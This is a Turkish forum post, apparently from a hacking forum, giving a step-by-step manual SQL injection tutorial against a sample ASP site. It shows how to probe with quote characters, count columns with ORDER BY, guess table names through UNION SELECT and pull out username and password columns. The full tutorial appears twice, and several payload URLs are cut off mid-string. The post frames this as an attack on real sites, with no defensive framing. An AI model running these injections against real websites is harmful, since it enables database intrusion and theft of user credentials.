manuel sql inj anlatimi
hedef sitemiz bu olsun örneğin; www.pasificsql.com
bu sitede açık olup olmadığını anlamak için id= değerli linkler bulmaya çalışcağız,
örneğin;
www.pasificsql.com/news.asp?id=10
aha id= değerli link hemen bakıyoruz site sonuna 'a veya " gibi karakterler ekliyerek hata almaya çalısıyoruz
hatamızı aldık hatamız şudur arkadaşlar ;
Microsoft JET Database Engine error 80040e14
Syntax error in string in query expression id = 10";.
/news.asp, line 7
" site sonuna koyunca yukardaki hatayı alıyorsak arkadaşlar sql var demekdir...
evet sql inj. var olduğunu gördük.şimdi ise sql inj. yapmamız için;
sitenin tablo adı,
kolon sayısını,
kolon adlarını,bilmemiz gerekmekdedir. ilk başta kolon sayısını bulalım;
kolon sayısını bulmak için +order+by+1 fonksiyonunu kullanacağız örnek;
www.pasificsql.com/news.asp?id=10+order+by+1
dedik sitenin herhangibir sayfası geldi karşımıza hata falan yok bu sql yok anlamına gelmiyor hata alana kadar devam...
www.pasificsql.com/news.asp?id=10+order+by+2 1 yerine 2
2 yerine 3 3 yerine 4 4 yerine 5..hata verene kadar devam.. hatamız şudur arkadaşlar ;
Microsoft JET Database Engine error 80040e14
The Microsoft Jet database engine does not recognize 10 as a valid field name or expression.
/news.asp, line 7
hatamiz budur arkadaşlar.
Devam edelim...
www.pasificsql.com/news.asp?id=10+order+by+8
dedik ekrana hata cıktı ozaman kolon sayımız 7 evet [hemen bulamayabiliriz ben örnek olarak 8 dedim]
Şimdi kolon sayısınıda bulduk ama, bir tek tablo adı ve o tablo adına uygun kolon adları kaldı.
+union+select+0,1,2,3,4,5,6,7+from+TabloAdı şeklinde deneyerek ulaşacağız tablo adımıza...
örnek : http://www.pasificsql.com/news.asp?i...,5,6+from+User
Dedik karşımıza hata çıktı diyelim çok normaldir panik yapmayın tablo adları çokdur yanlış girmiş olabiliriz...
tablo adlarının googledan ulaşabilrisiniz bazı tablo adları;
admin,admins,user,users,new,news
evet bizimkinin tablo adı news olsun;
http://www.pasificsql.com/news.aspid...,5,6+from+news
dedik kolon sayımı sayılarımız ekrana vurdu pat diye
ekranda yazan sayı diyelim 5 ile 6 olsun 5,6 yerine
5 yerine username
6 yerine password
yazarak ulaşabiliriz...
tamam pasific yazdık username,password'da bişey olduğu yok ne olcak bu ? diyebilirsiniz...
eğer olmassa isimler farklıdır
username yerine;
usname,name,uname olabilir.
password yerine;
upass,pas,uspass olabilir. deneyerek ulaşabilirsiniz...
ALİNTİ
hedef sitemiz bu olsun örneğin; www.pasificsql.com
bu sitede açık olup olmadığını anlamak için id= değerli linkler bulmaya çalışcağız,
örneğin;
www.pasificsql.com/news.asp?id=10
aha id= değerli link hemen bakıyoruz site sonuna 'a veya " gibi karakterler ekliyerek hata almaya çalısıyoruz
hatamızı aldık hatamız şudur arkadaşlar ;
Microsoft JET Database Engine error 80040e14
Syntax error in string in query expression id = 10";.
/news.asp, line 7
" site sonuna koyunca yukardaki hatayı alıyorsak arkadaşlar sql var demekdir...
evet sql inj. var olduğunu gördük.şimdi ise sql inj. yapmamız için;
sitenin tablo adı,
kolon sayısını,
kolon adlarını,bilmemiz gerekmekdedir. ilk başta kolon sayısını bulalım;
kolon sayısını bulmak için +order+by+1 fonksiyonunu kullanacağız örnek;
www.pasificsql.com/news.asp?id=10+order+by+1
dedik sitenin herhangibir sayfası geldi karşımıza hata falan yok bu sql yok anlamına gelmiyor hata alana kadar devam...
www.pasificsql.com/news.asp?id=10+order+by+2 1 yerine 2
2 yerine 3 3 yerine 4 4 yerine 5..hata verene kadar devam.. hatamız şudur arkadaşlar ;
Microsoft JET Database Engine error 80040e14
The Microsoft Jet database engine does not recognize 10 as a valid field name or expression.
/news.asp, line 7
hatamiz budur arkadaşlar.
Devam edelim...
www.pasificsql.com/news.asp?id=10+order+by+8
dedik ekrana hata cıktı ozaman kolon sayımız 7 evet [hemen bulamayabiliriz ben örnek olarak 8 dedim]
Şimdi kolon sayısınıda bulduk ama, bir tek tablo adı ve o tablo adına uygun kolon adları kaldı.
+union+select+0,1,2,3,4,5,6,7+from+TabloAdı şeklinde deneyerek ulaşacağız tablo adımıza...
örnek : http://www.pasificsql.com/news.asp?i...,5,6+from+User
Dedik karşımıza hata çıktı diyelim çok normaldir panik yapmayın
tablo adları çokdur yanlış girmiş olabiliriz...tablo adlarının googledan ulaşabilrisiniz bazı tablo adları;
admin,admins,user,users,new,news
evet bizimkinin tablo adı news olsun;
http://www.pasificsql.com/news.aspid...,5,6+from+news
dedik kolon sayımı sayılarımız ekrana vurdu pat diye
ekranda yazan sayı diyelim 5 ile 6 olsun 5,6 yerine
5 yerine username
6 yerine password
yazarak ulaşabiliriz...
tamam pasific yazdık username,password'da bişey olduğu yok ne olcak bu ? diyebilirsiniz...
eğer olmassa isimler farklıdır
username yerine;
usname,name,uname olabilir.
password yerine;
upass,pas,uspass olabilir. deneyerek ulaşabilirsiniz...
ALİNTİ
Son düzenleme:
